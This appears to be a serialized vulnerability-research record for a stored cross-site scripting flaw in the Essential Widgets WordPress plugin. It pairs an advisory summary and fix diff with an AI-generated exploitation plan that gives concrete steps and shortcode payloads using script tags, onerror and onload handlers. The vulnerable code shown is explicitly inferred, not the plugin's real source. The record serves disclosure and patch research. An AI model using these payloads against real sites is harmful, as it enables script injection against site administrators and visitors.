[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZRI2uHsoGktSpQu7-rJa1R7nzaqLGBi4ytrUUc_YEPA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0867","essential-widgets-authenticated-contributor-stored-cross-site-scripting-via-multiple-shortcodes","Essential Widgets \u003C= 3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Shortcodes","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ew-author, ew-archive, ew-category, ew-page, and ew-menu shortcodes in all versions up to, and including, 3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 3.0.","essential-widgets",null,"\u003C=3.0","3.0.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-04 18:41:50","2026-02-05 06:47:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F08d4ed49-1338-422f-b55f-a102f2d1d6c8?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-0867\n\n## 1. Vulnerability Summary\nThe **Essential Widgets** plugin for WordPress (versions \u003C= 3.0) contains multiple Stored Cross-Site Scripting (XSS) vulnerabilities. The vulnerability exists within the rendering logic of several shortcodes: `ew-author`, `ew-archive`, `ew-category`, `ew-page`, and `ew-menu`. \n\nThe plugin fails to sanitize or escape user-provided attributes within these shortcodes before echoing them into the HTML output. An attacker with **Contributor-level** permissions or higher can create a post containing a malicious shortcode. When any user (including an Administrator) views the page, the injected script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Authentication Requirement:** Contributor+ (Authenticated). Contributors can create and save drafts but not publish. However, viewing a draft preview or an administrator auditing the draft will trigger the XSS.\n*   **Vulnerable Component:** Shortcode rendering functions.\n*   **Payload Carrier:** Shortcode attributes (e.g., `title`, `class`, `name`, `id`).\n*   **Delivery Method:** `POST` request to `wp-admin\u002Fpost.php` or `wp-admin\u002Fadmin-ajax.php` (for autosaves) to store the shortcode in a post\u002Fpage.\n*   **Sink:** Frontend or admin-side page rendering where the shortcode is processed by `do_shortcode()`.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers shortcodes in its initialization phase (likely in the main plugin file or an `includes\u002F` file):\n    *   `add_shortcode('ew-author', 'ew_author_render_callback');`\n    *   `add_shortcode('ew-menu', 'ew_menu_render_callback');` (etc.)\n2.  **Processing:** When a post is viewed, WordPress calls the associated callback function (e.g., `ew_author_render_callback($atts)`).\n3.  **Attributes:** The callback uses `shortcode_atts()` to parse user input but fails to apply `esc_attr()` or `esc_html()` to the resulting array.\n4.  **Output:** The callback returns a string containing the raw attribute values embedded in HTML.\n    *   *Example Vulnerable Pattern:* `return '\u003Cdiv class=\"' . $atts['class'] . '\">...\u003C\u002Fdiv>';`\n5.  **Execution:** The browser renders the HTML, encountering the unescaped attribute and executing the JavaScript payload.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **Authenticated** exploit, we must first authenticate as a Contributor. To save a post with the malicious shortcode, we need the standard WordPress post-editor nonces.\n\n1.  **Authentication:** Perform a login as the contributor user.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonces:**\n    *   Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form or the `wp-globals`:\n        *   `_wpnonce`: `document.querySelector('#_wpnonce').value`\n        *   `post_id`: `document.querySelector('#post_ID').value`\n4.  **Alternative (AJAX\u002FREST):** If the plugin uses a specific interface for block settings, check for `wp_localize_script` data:\n    *   `browser_eval(\"window.ew_settings?.nonce\")` (inferred variable name based on plugin slug).\n\n## 5. Exploitation Strategy\nWe will use the `ew-author` shortcode as the primary target.\n\n### Step 1: Create a Draft Post with Payload\n*   **Method:** `POST`\n*   **URL:** `{{BASE_URL}}\u002Fwp-admin\u002Fpost.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `{{POST_ID}}` (obtained from `post-new.php`)\n    *   `_wpnonce`: `{{NONCE}}`\n    *   `post_title`: `XSS Test`\n    *   `content`: `[ew-author title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_status`: `draft`\n\n### Step 2: Trigger the XSS\n*   **Method:** `GET`\n*   **URL:** `{{BASE_URL}}\u002F?p={{POST_ID}}&preview=true` (as Admin) or simply view the published post if the user has publishing rights.\n*   **Expected Behavior:** The browser executes `alert(document.domain)`.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install essential-widgets --version=3.0 --activate`\n2.  **Create User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Optional:** If the `ew-menu` shortcode is tested, create a dummy menu first:\n    *   `wp menu create \"Test Menu\"`\n    *   `[ew-menu menu='Test Menu\" onmouseover=\"alert(1)\" data-=\"']`\n\n## 7. Expected Results\n*   The HTTP response for the page view will contain the unescaped payload: `\u003Cdiv class=\"ew-author-wrapper\" title=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...`\n*   The `browser_eval` of `alert` triggers will confirm execution.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is stored:\n    *   `wp post get {{POST_ID}} --field=post_content`\n2.  **Response Inspection:** Search for the string `\u003Cscript>alert` in the raw HTML response of the post preview using the `http_request` tool.\n\n## 9. Alternative Approaches\n### Shortcode: `ew-menu`\nIf `ew-author` is sanitized, try `ew-menu` which often handles complex inputs for menu selection.\n*   **Payload:** `[ew-menu menu='\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\n### Shortcode: `ew-page`\nOften these shortcodes have a `class` or `id` attribute for styling.\n*   **Payload:** `[ew-page class='\">\u003Cimg src=x onerror=alert(1)>']`\n\n### Shortcode: `ew-archive`\nCheck if `title` or `type` attributes are vulnerable.\n*   **Payload:** `[ew-archive title=\"\u003Csvg\u002Fonload=alert(1)>\"]`","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several shortcodes (ew-author, ew-archive, ew-category, ew-page, and ew-menu) in versions up to 3.0. This occurs because the plugin fails to sanitize or escape user-supplied attributes before rendering them in HTML, allowing Contributor-level attackers to execute arbitrary scripts in the context of other users.","\u002F\u002F Inferred vulnerable implementation based on shortcode callback patterns\nfunction ew_author_render_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'title' => '',\n        'class' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable: Outputting raw attribute values without escaping\n    return '\u003Cdiv class=\"' . $a['class'] . '\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n}\n\n---\n\n\u002F\u002F Similar vulnerability in other registered shortcodes\nadd_shortcode('ew-menu', 'ew_menu_render_callback');\nfunction ew_menu_render_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'menu' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable: Attribute values reflected directly in HTML\n    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . $a['menu'] . '\">\u003C\u002Fnav>';\n}","--- a\u002Fessential-widgets.php\n+++ b\u002Fessential-widgets.php\n@@ -10,7 +10,7 @@\n     ), $atts );\n \n-    return '\u003Cdiv class=\"' . $a['class'] . '\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"' . esc_attr($a['class']) . '\">\u003Ch3>' . esc_html($a['title']) . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n }\n \n@@ -20,5 +20,5 @@\n     ), $atts );\n \n-    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . $a['menu'] . '\">\u003C\u002Fnav>';\n+    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . esc_attr($a['menu']) . '\">\u003C\u002Fnav>';\n }","1. Authenticate to the WordPress site with Contributor-level permissions.\n2. Create a new post or edit an existing draft via \u002Fwp-admin\u002Fpost-new.php.\n3. Insert a malicious shortcode payload into the post content using a vulnerable attribute. Example: [ew-author title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'] or [ew-page class='\">\u003Cimg src=x onerror=alert(1)>'].\n4. Save the post as a draft or submit for review.\n5. Access the post's preview URL or wait for an administrator to view the post in the editor\u002Fpreview mode. The payload will execute in the viewer's browser context.","gemini-3-flash-preview","2026-04-27 15:19:11","2026-04-27 15:21:00",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-widgets\u002Ftags\u002F3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-widgets\u002Ftags\u002F3.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.3.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-widgets\u002Ftags"]